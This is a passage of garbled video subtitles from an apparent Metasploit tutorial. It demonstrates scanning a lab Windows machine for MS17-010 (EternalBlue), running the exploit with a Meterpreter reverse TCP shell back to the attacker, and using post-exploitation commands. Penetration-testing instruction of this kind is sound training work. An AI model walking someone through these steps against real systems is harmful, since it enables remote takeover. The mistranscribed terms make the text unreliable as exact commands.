00:21:45,160 --> 00:21:47,020
We're trying to get some information.
351
00:21:47,140 --> 00:21:51,460
We are trying to get wireless access point information, so again, also not a great one, removing
352
00:21:51,460 --> 00:21:53,500
a lock from the remote device lock.
353
00:21:53,540 --> 00:21:58,300
So, again, many different impulse exploitation that we can look at as part of media supply framework.
354
00:21:59,920 --> 00:22:04,660
So moving forward, of course, we have seen all of the exploits and of course, over here we can also
355
00:22:04,660 --> 00:22:05,740
use exploits.
356
00:22:06,070 --> 00:22:10,870
So in this case, I actually have a Windows operating system running over here so I can enter CMD.
357
00:22:10,900 --> 00:22:16,630
So this will show us the IP configuration of this particular this particular operating system.
358
00:22:16,630 --> 00:22:19,400
So we got one or two, one six eight one eight nine.
359
00:22:19,960 --> 00:22:24,610
So we are going to minimize this and that is going to be our target machine and we're going to use my
360
00:22:24,610 --> 00:22:27,060
display here to try to gain access into the system.
361
00:22:27,580 --> 00:22:32,710
So the first thing I use is perhaps I will search, I'll do a search on SMB because there is a very
362
00:22:32,710 --> 00:22:36,800
popular exploit in Windows using SMB or I could search on internal blue.
363
00:22:37,030 --> 00:22:38,660
So again, either one would be fine.
364
00:22:39,040 --> 00:22:42,040
So there's a lot of SMB over here so I can do a search on internal.
365
00:22:43,150 --> 00:22:46,530
And over here we've got five matching modules from our search results.
366
00:22:46,990 --> 00:22:49,990
So the first one is a auxillary module administrator.
367
00:22:49,990 --> 00:22:53,950
So it would be checking on the internal blue SMB windows.
368
00:22:53,950 --> 00:22:55,000
Come on execution.
369
00:22:55,270 --> 00:22:56,710
We got auxillary scanner.
370
00:22:56,710 --> 00:23:03,270
So scanner is actually a way for us to scan a system to see if it is vulnerable to a particular exploit.
371
00:23:03,550 --> 00:23:05,230
And of course, we've got a number of exploits here.
372
00:23:05,240 --> 00:23:06,910
We've got two, three, four and five.
373
00:23:07,180 --> 00:23:11,830
So we've got eternal blue, we got SMB MI 17 zero one zero.
374
00:23:12,040 --> 00:23:14,290
So again, we've got a blue internal blue eight.
375
00:23:14,290 --> 00:23:21,190
We got execute and of course that is on Eterno Blue Champion SMB Remote Windows Code execution.
376
00:23:21,190 --> 00:23:30,190
We've got Semba double pulser RSI so we can actually enter, use auxillary scanner SMB, SMB on a score
377
00:23:30,190 --> 00:23:33,370
at seventeen, hit enter indebt, enter show options.
378
00:23:34,660 --> 00:23:39,940
So over here again, if you see Caerphilly back into the sleights, we actually have a show options
379
00:23:39,940 --> 00:23:40,570
capability.
380
00:23:40,570 --> 00:23:45,710
So that is the part where we want to find out more information or details about the particular exploit.
381
00:23:45,910 --> 00:23:50,260
So again, we are able to find all those information directly from here by entering show options.
382
00:23:50,740 --> 00:23:53,830
So if you see over here, we can see all the show options available to you on that.
383
00:23:54,340 --> 00:23:55,750
So we can enter a set.
384
00:23:56,500 --> 00:23:58,890
Of course, here we can see the parameter that we have a key in.
385
00:23:58,900 --> 00:23:59,650
So required.
386
00:23:59,650 --> 00:24:00,260
No required.
387
00:24:00,310 --> 00:24:02,140
No, no, that's a yes.
388
00:24:02,140 --> 00:24:02,670
A nameplate.
389
00:24:02,680 --> 00:24:07,060
So we have already supplied those information over there and we have another one of our hosts so we
390
00:24:07,060 --> 00:24:13,300
can actually set our house and we can actually specify the IP address of the target machine.
391
00:24:13,660 --> 00:24:15,950
So one or two one six eight one eight nine.
392
00:24:16,090 --> 00:24:21,940
So go ahead, enter that one two one six eight one eight nine hit enter and that we can actually see
393
00:24:22,240 --> 00:24:25,270
the armholes information, of course, moving forward.
394
00:24:25,300 --> 00:24:27,680
We see that the rest of the information has been filled in.
395
00:24:28,120 --> 00:24:30,090
So once you're done on that, go ahead, hit front.
396
00:24:30,640 --> 00:24:34,120
So again, here we are checking whether the system invulnerable.
397
00:24:34,300 --> 00:24:40,770
So he says host is slightly vulnerable to me, 17 zero one zero Windows 10 zero one four three nine
398
00:24:41,030 --> 00:24:41,500
sixty four.
399
00:24:42,370 --> 00:24:47,380
So once we have check on the system, we can do a search once again to actually find out about what
400
00:24:47,380 --> 00:24:48,350
explodes we can use.
401
00:24:48,370 --> 00:24:55,750
So in this case, we can select number four so we can enter, use, exploit windows SMB Mouse 17 zero
402
00:24:55,750 --> 00:24:56,320
one zero.
403
00:24:57,910 --> 00:25:09,160
So use exploit windows SMB Mouse 17 zero one zero c p c heat enter and debt and to show options.
404
00:25:09,520 --> 00:25:15,010
So again, here we will see what are the parameters where it is compulsory for us to actually look into.
405
00:25:15,520 --> 00:25:20,290
So here we got the DB trace, which has already been Felic attempts already been filled.
406
00:25:20,560 --> 00:25:22,270
So we get a feeling into our hosts.
407
00:25:22,720 --> 00:25:28,240
So our host is the target IP address, as mentioned earlier, said our hosts one or two one six eight
408
00:25:28,390 --> 00:25:29,480
one eight nine.
409
00:25:29,500 --> 00:25:31,780
So in my case it is eight nine again.
410
00:25:31,780 --> 00:25:34,210
In your case it could be a different IP address.
411
00:25:34,420 --> 00:25:40,300
So we can go ahead and hit enter on debt and now we can enter show Paillot, what are the palettes available
412
00:25:40,300 --> 00:25:41,720
to get with this exploit?
413
00:25:42,070 --> 00:25:44,460
So again, it's retrieving the information from the database.
414
00:25:44,470 --> 00:25:49,330
So here we can see we've got two zero eight number of exploit, a number of Palouse that we can use.
415
00:25:50,050 --> 00:25:51,500
So here we can see Windows eight.
416
00:25:51,520 --> 00:25:54,160
Sixty four, we can see reverse Meenakshi DP.
417
00:25:54,400 --> 00:25:58,120
So the one is going to be the most suitable for today's tutorial.
418
00:25:58,300 --> 00:26:03,400
We're actually on me to Preeta, so let's screw up a little more and see that we can see all the windows.
419
00:26:03,520 --> 00:26:09,610
Sixty four metre preeta shell that we can get so in case we are going to be more interested in this
420
00:26:09,610 --> 00:26:09,810
one.
421
00:26:09,820 --> 00:26:11,980
So this is a Windows XP for me.
422
00:26:11,980 --> 00:26:14,210
To Preeta Reverse underscore the DP.
423
00:26:14,260 --> 00:26:15,610
So copy the selection.
424
00:26:16,240 --> 00:26:21,850
I'll scroll all the way down, I'll add to set payload and I'll pace the selection from the clipboard
425
00:26:22,300 --> 00:26:25,840
so I can pay selection hit enter on that enter show options.
426
00:26:26,200 --> 00:26:31,710
So now because we have a payload that would give us a shell reverse shell, we have to set the elbows
427
00:26:31,720 --> 00:26:33,440
or the local listener hostname.
428
00:26:34,000 --> 00:26:40,080
So what I'm going to do is I'm going to enter IP ADR the final the IP address of your colonics machine.
429
00:26:40,090 --> 00:26:44,550
So in this case I'll call the next machine is one or two one six eight one nine one.
430
00:26:45,010 --> 00:26:46,480
So go ahead and enter set.
431
00:26:47,440 --> 00:26:55,120
One, two one six eight one nine one and talk show options again to check all the options, all the
432
00:26:55,120 --> 00:26:57,940
values, and make sure that you have a key parameter on that.
433
00:26:58,630 --> 00:27:00,010
So here we go, Ellos.
434
00:27:00,010 --> 00:27:06,120
We got the airport number as well, and we got all the parameters set forward in as well in our house.
435
00:27:06,490 --> 00:27:10,170
So once you have all this information in place, go ahead, enter exploit.
436
00:27:10,270 --> 00:27:14,370
And that would give us our shall allow me to put a shell into the target machine.
437
00:27:14,800 --> 00:27:17,440
So once you're in the shell meter, pretty shake and enter help.
438
00:27:17,680 --> 00:27:23,200
So once again, in help, we can see all the modules available for us and we can actually see a lot
439
00:27:23,200 --> 00:27:27,010
of information, a lot of capabilities, a lot of things that we can enter into.
440
00:27:27,490 --> 00:27:33,790
So one example is we can actually enter the different kind of modules that we can use at our car, commands
441
00:27:33,790 --> 00:27:34,490
that we can use.
442
00:27:34,810 --> 00:27:40,350
So the question mark also is a way to put up the help manual and we can background a current session.
443
00:27:40,360 --> 00:27:44,490
We can kill processes that are inside a system, we can migrate and so on.
444
00:27:44,500 --> 00:27:50,950
So some of the commonly used ones will be on the system information system infl so we can go ahead and
445
00:27:50,950 --> 00:27:53,650
screw all the way down and antiracist infl.
446
00:27:54,070 --> 00:27:58,030
So it's very important that you try out all these different commands because it will be very helpful
447
00:27:58,030 --> 00:28:03,980
for you to get yourself familiar with Matus framework so you understand everything about Matus framework.
448
00:28:04,630 --> 00:28:08,440
So once again, I hope you learned something valuable in today's lecture and tutorial.
449
00:28:08,710 --> 00:28:13,300
And if you like what you watch remotely like, subscribe to the channel so that you can be kept abreast
450
00:28:13,390 --> 00:28:14,830
of the latest episode of Tutorial.
451
00:28:15,130 --> 00:28:19,300
And if have any questions, feel free to leave a comment below and I'll try my best to answer any of
452
00:28:19,300 --> 00:28:19,900
your queries.
453
00:28:20,590 --> 00:28:22,120
Thank you so much once again for watching.
49931
Can't find what you're looking for?
Get subtitles in any language from opensubtitles.com, and translate them here.